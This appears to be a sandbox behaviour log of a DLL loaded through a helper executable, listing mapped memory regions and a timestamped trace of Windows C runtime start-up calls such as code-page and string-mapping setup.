[0x7] Region: id = 690 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 691 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 692 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 693 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 694 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 695 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 696 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 697 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 698 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 699 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 700 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 701 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 702 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 703 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 704 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 705 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 706 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 707 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 708 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 709 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 710 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 711 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 712 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 713 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 714 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 715 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 716 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 717 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 718 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 719 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 720 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 721 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 722 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 723 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 724 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 725 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 726 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 727 start_va = 0x620000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 728 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 729 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 730 start_va = 0x620000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 731 start_va = 0x7d0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Thread: id = 32 os_tid = 0xaf0 [0031.716] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af92c | out: lpSystemTimeAsFileTime=0x2af92c*(dwLowDateTime=0xe0a15950, dwHighDateTime=0x1d3dfba)) [0031.716] GetCurrentProcessId () returned 0xaec [0031.716] GetCurrentThreadId () returned 0xaf0 [0031.716] GetTickCount () returned 0x17177 [0031.716] QueryPerformanceCounter (in: lpPerformanceCount=0x2af924 | out: lpPerformanceCount=0x2af924*=361277383) returned 1 [0031.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.717] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.717] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.719] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.720] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.720] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.720] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.720] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.720] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.721] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.721] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.721] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.721] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.721] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.721] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.721] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.722] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.722] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.722] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.722] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.722] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.722] GetCurrentThreadId () returned 0xaf0 [0031.722] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"0\"" [0031.722] GetEnvironmentStringsW () returned 0x427860* [0031.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7d09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.723] FreeEnvironmentStringsW (penv=0x427860) returned 1 [0031.723] GetStartupInfoA (in: lpStartupInfo=0x2af87c | out: lpStartupInfo=0x2af87c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.723] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.723] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.723] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.723] SetHandleCount (uNumber=0x20) returned 0x20 [0031.723] GetLastError () returned 0x0 [0031.723] SetLastError (dwErrCode=0x0) [0031.723] GetLastError () returned 0x0 [0031.723] SetLastError (dwErrCode=0x0) [0031.723] GetLastError () returned 0x0 [0031.723] SetLastError (dwErrCode=0x0) [0031.723] GetACP () returned 0x4e4 [0031.723] GetLastError () returned 0x0 [0031.723] SetLastError (dwErrCode=0x0) [0031.723] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.723] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af85c | out: lpCPInfo=0x2af85c) returned 1 [0031.723] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af328 | out: lpCPInfo=0x2af328) returned 1 [0031.724] GetLastError () returned 0x0 [0031.724] SetLastError (dwErrCode=0x0) [0031.724] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2af2b8 | out: lpCharType=0x2af2b8) returned 1 [0031.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af73c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af73c, cbMultiByte=256, lpWideCharStr=0x2af0a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0031.724] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x2af33c | out: lpCharType=0x2af33c) returned 1 [0031.724] GetLastError () returned 0x0 [0031.724] SetLastError (dwErrCode=0x0) [0031.724] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af73c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af73c, cbMultiByte=256, lpWideCharStr=0x2af078, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.724] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.724] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2aee68, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.724] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2af63c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x86ÀÄõtø*", lpUsedDefaultChar=0x0) returned 256 [0031.724] GetLastError () returned 0x0 [0031.724] SetLastError (dwErrCode=0x0) [0031.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af73c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af73c, cbMultiByte=256, lpWideCharStr=0x2af098, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.724] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.724] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2aee88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.724] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2af53c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ 